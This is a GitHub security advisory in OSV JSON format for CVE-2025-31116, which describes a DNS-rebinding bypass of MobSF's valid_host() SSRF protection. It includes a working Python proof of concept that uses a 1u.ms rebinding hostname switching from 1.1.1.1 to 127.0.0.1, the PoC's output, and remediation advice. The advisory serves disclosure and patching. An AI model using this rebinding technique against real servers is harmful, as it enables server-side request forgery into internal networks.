{
  "schema_version": "1.4.0",
  "id": "GHSA-fcfq-m8p6-gw56",
  "modified": "2025-06-13T04:11:18Z",
  "published": "2025-03-31T17:23:21Z",
  "aliases": [
    "CVE-2025-31116"
  ],
  "summary": "Mobile Security Framework (MobSF) has a SSRF Vulnerability fix bypass on assetlinks_check with DNS Rebinding",
  "details": "### Summary\n\nThe latest deployed fix for the SSRF vulnerability is through the use of the call `valid_host()`. The code available at lines [/ae34f7c055aa64fca58e995b70bc7f19da6ca33a/mobsf/MobSF/utils.py#L907-L957](https://github.com/MobSF/Mobile-Security-Framework-MobSF/blob/ae34f7c055aa64fca58e995b70bc7f19da6ca33a/mobsf/MobSF/utils.py#L907-L957) is vulnerable to SSRF abuse using DNS rebinding technique.\n\n### PoC\n\nThe following proof of concept: \n\n```python\ndef valid_host(host):\n    \"\"\"Check if host is valid.\"\"\"\n    try:\n        prefixs = ('http://', 'https://')\n        if not host.startswith(prefixs):\n            host = f'http://{host}'\n        parsed = urlparse(host)\n        domain = parsed.netloc\n        path = parsed.path\n        if len(domain) == 0:\n            # No valid domain\n            return False, None\n        if len(path) > 0:\n            # Only host is allowed\n            return False, None\n        if ':' in domain:\n            # IPv6\n            return False, None\n        # Local network\n        invalid_prefix = (\n            '100.64.',\n            '127.',\n            '192.',\n            '198.',\n            '10.',\n            '172.',\n            '169.',\n            '0.',\n            '203.0.',\n            '224.0.',\n            '240.0',\n            '255.255.',\n            'localhost',\n            '::1',\n            '64::ff9b::',\n            '100::',\n            '2001::',\n            '2002::',\n            'fc00::',\n            'fe80::',\n            'ff00::')\n        if domain.startswith(invalid_prefix):\n            return False, None\n        ip = socket.gethostbyname(domain)\n        if ip.startswith(invalid_prefix):\n            # Resolve dns to get IP\n            return False, None\n        return True, ip\n    except Exception:\n        return False, None\n\nimport random\nimport time\nimport socket\nfrom urllib.parse import urlparse\n\nif __name__ == '__main__':\n    print(\"Generating random host ...\", end=' ')     \n    prefix = random.randint(999_999, 9_999_999)\n    host = f\"{prefix}-make-1.1.1.1-rebindfor30safter1times-127.0.0.1-rr.1u.ms\"\n    print(\"Done\")\n    print(f\"Testing with '{host}' ... \", end=\" \")\n    valid, ip = valid_host(host)\n    if valid:\n        print(f\"Successful Bypass\")\n        print(f\" - Host initially resolved to: {ip}\")\n        print(\"Sleeping for 1 second ...\")\n        time.sleep(1)\n        print(f\" - Second use host will be resolved to: {socket.gethostbyname(host)}\")\n        print(f\" - Third use host will be resolved to: {socket.gethostbyname(host)}\")\n        print(\"Sleeping for 30 seconds ...\")\n        time.sleep(30)\n    else:\n        print(f\"Invalid host\")\n\n```\n\nYields : \n\n```\n$ python3 poc.py\nGenerating random host ... Done\nTesting with '5084216-make-1.1.1.1-rebindfor30safter1times-127.0.0.1-rr.1u.ms' ...  Successful Bypass\n - Host initially resolved to: 1.1.1.1\nSleeping for 1 second ...\n - Second use host will be resolved to: 127.0.0.1\n - Third use host will be resolved to: 127.0.0.1\nSleeping for 30 seconds ...\n```\n\nWhich generate an initlal random url that leverages dns rebinding after 1 time host resolution and remains to that IP for 30 seconds.\nAs you can notice the initial resolution was pointing to `1.1.1.1`. The second time the IP was resolved to `127.0.0.1`. Such an attack could be adjusted for other IP addresses.\n\n### Impact\n\nThe usual impact of Server-side request forgery.\n\n### Remediation \n\n- Avoid the use of `socket.gethostbyname()` since it issues and DNS query.",
  "severity": [
    {
      "type": "CVSS_V3",
      "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:N/A:L"
    }
  ],
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "mobsf"
      },
      "ranges": [
        {
          "type": "ECOSYSTEM",
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.3.2"
            }
          ]
        }
      ]
    }
  ],
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-fcfq-m8p6-gw56"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31116"
    },
    {
      "type": "WEB",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF/commit/4b8bab5a9858c69fe13be4631b82d82186e0d3bd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/MobSF/Mobile-Security-Framework-MobSF"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mobsf/PYSEC-2025-48.yaml"
    }
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-918"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2025-03-31T17:23:21Z",
    "nvd_published_at": "2025-03-31T17:15:42Z"
  }
}